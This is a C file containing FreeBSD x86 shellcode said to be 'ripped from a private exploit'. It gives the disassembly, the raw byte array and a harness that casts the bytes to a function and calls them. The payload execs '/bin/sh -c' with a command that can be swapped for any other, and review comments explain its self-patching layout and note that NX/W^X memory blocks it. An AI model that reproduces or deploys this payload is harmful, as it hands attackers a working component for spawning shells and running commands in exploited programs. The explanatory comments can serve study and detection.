/*
        FreeBSD Shellcode
        ripped from a private exploit :)
        
        jmp    0x37
        pop    %esi
        xor    %eax,%eax
        mov    %al,0xfffffffa(%esi)
        mov    %eax,0xfffffff5(%esi)
        mov    %esi,(%esi)
        mov    %esi,0x4(%esi)
        mov    %esi,0x8(%esi)
        addl   $0x10,(%esi)
        addl   $0x18,0x4(%esi)
        addl   $0x1b,0x8(%esi)
        mov    %eax,0xc(%esi)
        mov    %al,0x17(%esi)
        mov    %al,0x1a(%esi)
        mov    %al,0x1d(%esi)
        push   %eax
        push   %esi
        pushl  (%esi)
        mov    $0x3b,%al
        push   %eax
        nop
        lcall  $0x707,$0x1010101
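        call   0xc4ffffff
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        .string "/bin/sh.-c.sh"
      Note on the listing: the call is encoded e8 c4 ff ff ff, a relative call
      back to the pop %esi (the target printed above is a disassembler
      artifact). The eight add lines are 16 filler bytes of 0x02 decoded as
      code; the stub overwrites them with the argv pointers. Each '.' in the
      string is a placeholder byte that the stub overwrites with NUL at run time.
      Replace .sh with .anycommand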
*/

/*
 * Raw bytes of the stub disassembled in the header comment: 91 bytes, with no
 * NUL before the array's terminator, which is why strlen() can measure it.
 *
 * Layout, relative to the address the stub pops into %esi (byte offset 62):
 *   -11 .. -6   operand of the far call, stored as 01 01 01 01 / 07 07 and
 *               zeroed by the stub so the executed instruction is lcall $7,$0
 *   +0  .. +15  filler (0x02), overwritten with three pointers and a NULL
 *   +16 ..      "/bin/sh", "-c", "sh", separated by '.' placeholders that the
 *               stub replaces with NUL
 *
 * For review and detection: the stub writes into its own instruction bytes, so
 * it only works from memory that is both writable and executable, and it ends
 * in a call with %al = 0x3b (execve in the header listing) on that argv.
 */
char code[]=
/* jmp to the trailing call; pop %esi; clear %eax; patch the lcall operand */
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
/* store %esi in the three pointer slots, then add 0x10 / 0x18 / 0x1b */
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
/* NULL-terminate the pointer list and the three strings; begin pushing args */
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
/* %al = 0x3b; far call (operand patched above); relative call back to the pop */
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
/* end of the call displacement, then the 0x02 filler that becomes the pointers */
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
/* last filler bytes, then the string data with '.' placeholders */
"\x02\x02\x02/bin/sh.-c.sh";

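/*
 * Test harness: prints the payload length and then calls the bytes in `code`
 * as if they were a function.
 *
 * Returns 0 if the call comes back. If the stub's execve succeeds, the process
 * image is replaced and control never returns here.
 *
 * NOTE(review): this file includes no headers, so printf and strlen rely on
 * implicit declarations, which C99 and later reject; <stdio.h> and <string.h>
 * belong at the top of the file.
 *
 * NOTE(review): `code` is an ordinary writable data array. Where data pages
 * are mapped non-executable (NX / W^X), the indirect call below faults instead
 * of running the bytes. The stub also writes into itself, so a read-only
 * executable mapping would stop it as well.
 */
int main(void)
{
  int (*f)();

  /* Object-to-function pointer cast: not strictly conforming C, but it is the
     whole point of the harness. */
  f = (int (*)()) code;

  /* strlen returns size_t; cast so the argument matches %d on LP64 targets. */
  printf("FreeBSD custom shellcode, %d bytes\n", (int)strlen(code));

  (void)(*f)();
  return 0;
}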

